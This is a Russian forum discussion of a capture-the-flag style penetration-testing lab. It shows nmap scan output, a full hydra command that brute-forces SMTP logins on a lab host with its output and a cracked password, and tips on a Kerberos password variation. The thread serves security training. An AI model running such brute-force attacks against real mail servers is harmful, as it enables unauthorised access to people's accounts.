Тестовая лаборатория обновляется примерно с интервалом раз в полгода. То есть полгода доступна эта эмулированая корпоративная сеть , а через полгода будут новые таски,новые векторы,и новая сеть.

Вопросы:

1) Почему у меня nmap не отобразил название домена.

Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-16 18:40 MSK
Nmap scan report for 192.168.101.9
Host is up (0.12s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
443/tcp open https
8100/tcp open xprint-server

2) Подбор пароля.
Как видно из скрина ТС, подбор был сделан за мгновенье.
У меня это так

#hydra -L users.txt -P /usr/share/john/password.lst -F -o good.txt smtp://192.168.101.9
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra ([S]link removed[/S]) starting at 2016-12-16 18:52:18
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 64 tasks, 10677 login tries (l:3/p:3559), ~10 tries per task
[DATA] attacking service smtp on port 25
[STATUS] 217.00 tries/min, 217 tries in 00:01h, 10460 to do in 00:49h, 16 active
[STATUS] 211.00 tries/min, 633 tries in 00:03h, 10044 to do in 00:48h, 16 active
[STATUS] 182.14 tries/min, 1275 tries in 00:07h, 9413 to do in 00:52h, 16 active
[STATUS] 176.87 tries/min, 2653 tries in 00:15h, 8085 to do in 00:46h, 16 active

Пароль justdoit стоит в файле 1541 - значит его уже проскочили...
В чем проблема?

PS Создал свой файл паролей, внес туда justdoit все нашлось быстро. Файл из 40 пассов сделал.

В итоге перезапустил вновь и вот итог
[STATUS] 215.36 tries/min, 7753 tries in 00:36h, 2924 to do in 00:14h, 16 active
[25][smtp] host: 192.168.101.9 login: a.modlin@gds.lab password: justdoit
[STATUS] attack finished for 192.168.101.9 (valid pair found)

Меня смутило:

ТС написал - если на пенлабах пас 15-20 мин не найден, что то не так. ТС - быть может словарь за ранее подготовил для подготовки статьи?

Что касается брута пароля, то в целях демонстрации я просто перенес пароль justdoit на первые позиции в словаре,(для того что бы видео сделать более коротким,так как в видео я просто изобразил подход к взятию токена... Касательно 1541 позиции то в словаре джона больше 3к паролей,и если пользователь a.modlin стоял в вашем списке пользователей на третей позиции - то примерная успешная попытка пароля было бы где то после 7500-й попытки.(так как 3000*2+1541~= 7541) Так как гидре нужно будет перебрать первые две учетные записи по всему словарю

Касательно нмапа- не совсем понял вопрос...
Вероятней всего вы про мой скрин где в первых строчках вывода нмапа есть gds.lab
Что бы разобраться с этим вопросом - прикрепите пожалуйста скрин содержимого файла /etc/hosts

Хорошо замечено) Дело в том что изначально брутились две учетки которые были в контактах на 192.168.101.9
После того как брут не дал результатов было обнаружено в исходном коде имя и фамилия Альфреда Модлина, и потом брут был только по одной этой учетной записи,так брутить снова первых две учетные записи не было смысла)
Ну а так да... Вношу поправку в свои слова) "Если у вас брутится одна учетка больше 15-20 минут - значит что то не так)
Опять же таки врайтап был написан для демонстрации логики и вектора эксплуатации,на самом деле при старте лабы никто так быстро токены не находит) Все путем проб и ошибок, я не расписовал в статье все свои действия - так как бы это было бы результатом очень длинной и скучной статьи)

~~DarkNode~~ - благодарю за ответ! Я забыл, про другие учетки и время на них :\ По nmap - видел тему с файл хостом, когда 192.168.101.9 туда внесли, но я не уловил - откуда взяли изначально название, перед внесением в файл, =)

Если мы перейдем просто по айпи адресу - то нас редиректит на store.gds.lab
Соответственно я добавлял в /etc/hosts

Код:

Посмотри тут. На годика 2 тебе смело хватит.

@~~DarkNode~~, а на таких площадках, как Test lab, часто для брута хватает встроенных словарей Kali/ParrotSec? Или бывали случаи, когда надо было самому делать словари с помощью crunch'а и т.п. утилит, например?

Пока всегда хватало) Единственный момент был в этой лабе) Что Керберос по умолчанию использует строгую парольную политику и для входа на систему нужно было бы просто изменить регистр первой буквы в уже имеющим пароле)